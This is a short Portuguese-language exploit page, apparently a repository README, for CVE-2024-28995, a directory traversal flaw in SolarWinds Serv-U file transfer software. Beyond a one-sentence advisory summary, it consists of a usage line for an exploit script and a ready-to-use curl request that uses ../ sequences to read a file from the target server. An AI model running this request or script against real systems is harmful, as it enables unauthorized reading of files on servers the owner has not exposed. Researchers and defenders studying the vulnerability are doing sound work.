
Exploit para CVE-2024-28995
Em 5 de junho de 2024, a SolarWinds publicou um aviso para CVE-2024-28995, uma vulnerabilidade de alta gravidade de travessia de diretório que afeta sua solução de transferência de arquivos Serv-U. A vulnerabilidade foi descoberta pelo pesquisador Hussein Daher da Web Immunify.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
Referência: